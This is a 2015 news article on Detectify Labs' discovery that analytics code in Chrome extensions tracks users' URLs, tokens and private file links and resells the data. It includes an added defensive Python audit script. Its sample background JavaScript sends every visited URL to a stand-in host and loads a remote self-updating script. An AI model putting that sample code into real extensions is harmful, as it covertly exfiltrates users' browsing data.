Hidden analytics code tracks everything users do, EVERYTHING

Nov 23, 2015 17:58 GMT

Analytics code deeply hidden in popular Google Chrome extensions is being used to track users across the Web, in different browser tabs, and without user consent.

Swedish company Detectify Labs made this discovery, and its researchers are pointing the finger at popular extensions like HooverZoom, SpeakIt, ProxFlow, Instant Translate, FB Color Changer, SafeBrowse, JavaScript Error Notifier, SuperBlock AdBlocker, and more.

According to Detectify researchers, the extensions that engage in such practices are doing it without obtaining user consent, have the tracking feature enabled by default, and also have dodgy user privacy policies to begin with.

Analytics providers are tracking much more than the user's browsing history

Detectify's team has observed Chrome extensions track not only the user's browser history but also data from cookies, secret access tokens from Facebook Connect and links to private Dropbox or Google Drive files.

While it is understandable for analytics providers to be interested in getting their grubby little hands on user details through any means they can, the methods employed via Chrome extensions are bordering on criminal activity.

The analytics providers where all this information ends up sell access to the sensitive data to anyone with an open wallet. The researchers even signed up for one such service and, after sifting through the warehoused data, were able to find internal PDFs uploaded to AWS servers, intranet URLs that could expose a company's internal network structure, and the URLs commonly visited by employees of targeted competitors.

An extension's tracking code could update itself, even if the extension was abandoned

Researchers even observed one sneaky analytics SDK that included self-updating functionality that kept working even if the extension itself was never updated. This allowed the analytics company to change the tracking code and add new functionality even after the extension's author had abandoned the project.

Detecting such extensions is also tricky since most of them use a separate extension process in the browser's background to carry out their snooping activities.
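One way a defender could triage an extension for the behaviours described above (URL-reading permissions, a background page, navigation listeners, and remote code loading that lets an SDK update itself), as an added Python example that is not from the article or from Detectify; the manifest, background script and host names are constructed for illustration:

```python
import json
import re

# Constructed sample input for a hypothetical extension (not one of the extensions
# named in the article): its manifest and background script.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 2,
    "name": "Example Helper",
    "permissions": ["tabs", "<all_urls>", "storage"],
    "background": {"scripts": ["bg.js"]},
})
SAMPLE_BG_JS = """
chrome.tabs.onUpdated.addListener(function (id, info, tab) {
  if (info.url) {  // every URL the user visits, in every tab
    var x = new XMLHttpRequest();
    x.open('GET', 'https://stats.example/c?u=' + encodeURIComponent(info.url));
    x.send();
  }
});
var s = document.createElement('script');  // fetches a fresh SDK build on each start
s.src = 'https://cdn.example/sdk/latest.js';
document.head.appendChild(s);
"""

# Permissions that let a background page see URLs from every tab.
URL_PERMS = {"tabs", "<all_urls>", "webRequest", "webNavigation", "history"}
# Events a background script can use to observe navigation as it happens.
URL_EVENTS = ("tabs.onUpdated", "webNavigation.onCommitted", "webRequest.onBeforeRequest")
# Remote script injection or dynamic evaluation: the self-updating SDK pattern.
REMOTE_CODE = re.compile(r"""\.src\s*=\s*['"]https?://|\beval\(|new Function\(""")
EXTERNAL_HOST = re.compile(r"https?://([\w.-]+)")


def audit_extension(manifest_json, background_js):
    """Return (findings, hosts): heuristic findings and the external hosts the script names."""
    manifest = json.loads(manifest_json)
    findings = []
    granted = URL_PERMS & set(manifest.get("permissions", []))
    if granted:
        findings.append("url-permissions:" + ",".join(sorted(granted)))
    if "background" in manifest:
        findings.append("background-page")  # runs even when no tab of the site is open
    if any(ev in background_js for ev in URL_EVENTS):
        findings.append("url-observation")  # reacts to navigation in other tabs
    if REMOTE_CODE.search(background_js):
        findings.append("remote-code")  # behaviour can change without a store update
    hosts = sorted(set(EXTERNAL_HOST.findall(background_js)))
    return findings, hosts


if __name__ == "__main__":
    print(audit_extension(SAMPLE_MANIFEST, SAMPLE_BG_JS))
```

The hosts list is the starting point for an egress check: a network-level block or alert on those domains stops the reporting even for an extension that later swaps in new SDK code.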

Above all, researchers blame the extensions' authors who, in their quest to monetize their code, allow such snakes to nestle in their add-ons.

"We’ve seen some indications on Chrome Extension-forums that it’s around $0.04 per user/month," say Linus Särud and Frans Rosén of Detectify Labs. "For plugins with over tens and hundreds of thousands of users that equals [to] a substantial amount of monthly income."

As for Firefox add-ons, the researchers analyzed only one extension and found it to have similar functionality.